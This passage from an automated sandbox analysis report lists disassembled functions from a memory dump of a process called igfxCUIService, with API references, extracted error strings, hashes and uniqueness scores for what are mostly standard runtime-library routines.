                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                  • String ID:
                                  • API String ID: 3269011525-0
                                  • Opcode ID: 2de3991e41cb3c942c1f87f3ef68736ca8127e94ec893954e2b4fa44cbcfc710
                                  • Instruction ID: c15cb974c29ec268ed2727c8c1ce22c0ba0e433c50a1bc421a0839b7d6c65478
                                  • Opcode Fuzzy Hash: 2de3991e41cb3c942c1f87f3ef68736ca8127e94ec893954e2b4fa44cbcfc710
                                  • Instruction Fuzzy Hash: D8E01232941B34EFC7111F58FC0998D7E28AB077A3F015120FD05A63A4C66958049BF5
                                  Uniqueness

                                  Uniqueness Score: 3.32%

                                  Function 00D43760, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00D43769
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4377C
                                  • _free.LIBCMT ref: 00D4378D
                                  • _free.LIBCMT ref: 00D4379E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 3a4cedb15849ef4e410ca0b035de471779e0f104c68ff209f1bf718ec41086ce
                                  • Instruction ID: c2c5d3cca2356c7bf637e9741bcc08d775cb4a55a7bd26393946efb38124c5ab
                                  • Opcode Fuzzy Hash: 3a4cedb15849ef4e410ca0b035de471779e0f104c68ff209f1bf718ec41086ce
                                  • Instruction Fuzzy Hash: 87E09971820BA09B86026F54BC0184A3F22EB5B7103051226F40196BB3CBFA4A5A9BB2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D13040, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D133AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$ror
                                  • API String ID: 2659868963-4201802366
                                  • Opcode ID: 3fb0a6f96070405df3c0d1db9675f4ab7237da60610466f3fb4796efc5e2ffb9
                                  • Instruction ID: 830a4b53a1e08b202717b619b317508c1eaea4630e1de5197efd158fb9f16fb3
                                  • Opcode Fuzzy Hash: 3fb0a6f96070405df3c0d1db9675f4ab7237da60610466f3fb4796efc5e2ffb9
                                  • Instruction Fuzzy Hash: 36B190719002589FEB19CF68DC45B9DFBB2EF85304F108298E418AB396DB759AC4CB71
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D31730, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 259UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D31800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: cannot get value
                                  • API String ID: 118556049-2333289761
                                  • Opcode ID: b3134a63dec23285748293be9368f15d5a7d846457bff7898077ad03b71b8898
                                  • Instruction ID: 3c4ee9075d153628dd4253641fa48781274fbfef5cda9749177f6495f685689d
                                  • Opcode Fuzzy Hash: b3134a63dec23285748293be9368f15d5a7d846457bff7898077ad03b71b8898
                                  • Instruction Fuzzy Hash: 03919E7990021A9FCB14DF98D490AAEFBB4FF58310F188199E855AB346D730AD05CFB0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D12D50, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 255UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: [json.exception.
                                  • API String ID: 0-791563284
                                  • Opcode ID: e6185e3edabc929ff573ce7b01e2272315bfb854afdec083921394c73db801b0
                                  • Instruction ID: a0bc33c537cecfcbd1bf70cf354e062e475a14c8582a34eecabbb46a79e8dd0b
                                  • Opcode Fuzzy Hash: e6185e3edabc929ff573ce7b01e2272315bfb854afdec083921394c73db801b0
                                  • Instruction Fuzzy Hash: 2C9115719002489BEB18CF68D885BEEFBB5EF45304F10465CE814A73C2DB75AA95CBB0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D45CAD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                  Download Yara Rule
                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 00D45D3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: 3a1ebb6794a02e3fc77323092ba9b09dea6031ef931267f8805a4c5987aa3873
                                  • Instruction ID: 2e7dff05a39d73c1e38d8ba4678c19139d1b168d334fb02cf7494d795d506de4
                                  • Opcode Fuzzy Hash: 3a1ebb6794a02e3fc77323092ba9b09dea6031ef931267f8805a4c5987aa3873
                                  • Instruction Fuzzy Hash: 67517A29E08A0197CF117714D9553696BA0EF40702F2C4D68ECE2862AEEB30CCCD9E72
                                  Uniqueness

                                  Uniqueness Score: 0.11%

                                  Function 00D395DE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112UNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D39603
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: f5aa083b73e5f35439aad1bbca8c639b037f2f1c449f61897d9f788b0f2aaac1
                                  • Instruction ID: fb60f49807657899b9b2867e118131012444a392574f77d022e34b13ff2d0768
                                  • Opcode Fuzzy Hash: f5aa083b73e5f35439aad1bbca8c639b037f2f1c449f61897d9f788b0f2aaac1
                                  • Instruction Fuzzy Hash: A1417872900209AFCF16DF98CC92AEEBBB5FF48304F1881A9F904A7261D3759950DF60
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D12850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D1287B
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D128CA
                                    • Part of subcall function 00D35876: _Yarn.LIBCPMT ref: 00D35895
                                    • Part of subcall function 00D35876: _Yarn.LIBCPMT ref: 00D358B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 1908188788-1405518554
                                  • Opcode ID: 22d6fdd791c90981b1d303ddc7d85292a6fb51751d937c53b846f5b629961a9d
                                  • Instruction ID: e9caac9ff5e4ea0564129664dbb1427af1630d9ab13393ac00945e21a5de0ea6
                                  • Opcode Fuzzy Hash: 22d6fdd791c90981b1d303ddc7d85292a6fb51751d937c53b846f5b629961a9d
                                  • Instruction Fuzzy Hash: 92119E71904B44AFD320CF69D801747BBE4EB19710F008A1EE889C7B80D7B5A508CBB1
                                  Uniqueness

                                  Uniqueness Score: 3.53%

                                  Function 00D2FD86, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2FE2A
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2FE40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: fdb259bb2c90af5c4afbe49b9b1017f0d938742fa677713ce2cefd6ac6db09ef
                                  • Instruction ID: df5ffb118dd57dd8bf57cdf1c6eec9cd95cca7bf1fd93921be9d9274153c2357
                                  • Opcode Fuzzy Hash: fdb259bb2c90af5c4afbe49b9b1017f0d938742fa677713ce2cefd6ac6db09ef
                                  • Instruction Fuzzy Hash: 40214A70C1422CEEDB11EBA0C845BDEBB78AF15308F544099E845B3282EB706B48DFB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D292E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41UNIQUE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D355C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D355D0
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D2930F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D29336
                                  Strings
                                  • invalid string position, xrefs: 00D292E0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy$std::invalid_argument::invalid_argument
                                  • String ID: invalid string position
                                  • API String ID: 2082942147-1799206989
                                  • Opcode ID: 8c55da7eeb292689d1209a0f610b9b557745d10130b50c46bff5d6ad5b17e473
                                  • Instruction ID: 63bd840da52052bbbcc2f10307f563192a2ae40ae17beb3113aa526b7fcef39a
                                  • Opcode Fuzzy Hash: 8c55da7eeb292689d1209a0f610b9b557745d10130b50c46bff5d6ad5b17e473
                                  • Instruction Fuzzy Hash: 24F0ECB6910719ABC7019FA9D844886F7ECFE563117108726F91597B00F7B0F5688BB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D364F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22UNIQUE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D13F80: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00D36520,?,?,?,00D12074), ref: 00D13F85
                                    • Part of subcall function 00D13F80: GetLastError.KERNEL32(?,?,?,00D12074), ref: 00D13F8F
                                  • IsDebuggerPresent.KERNEL32(?,?,?,00D12074), ref: 00D36524
                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D12074), ref: 00D36533
                                  Strings
                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D3652E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                  • API String ID: 3511171328-631824599
                                  • Opcode ID: d3ca6fe190a3324d8fb9144065ba4e1630b306d73786647c07b5767b804687e0
                                  • Instruction ID: 9599cf8aca123d5d977a307951b3c56036b386fd34d490796d044b8b94133d3d
                                  • Opcode Fuzzy Hash: d3ca6fe190a3324d8fb9144065ba4e1630b306d73786647c07b5767b804687e0
                                  • Instruction Fuzzy Hash: 99E0C9B0200751ABD721AF69E4047467AE4EB14756F0489ADE846C6744FBB4D5888BB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%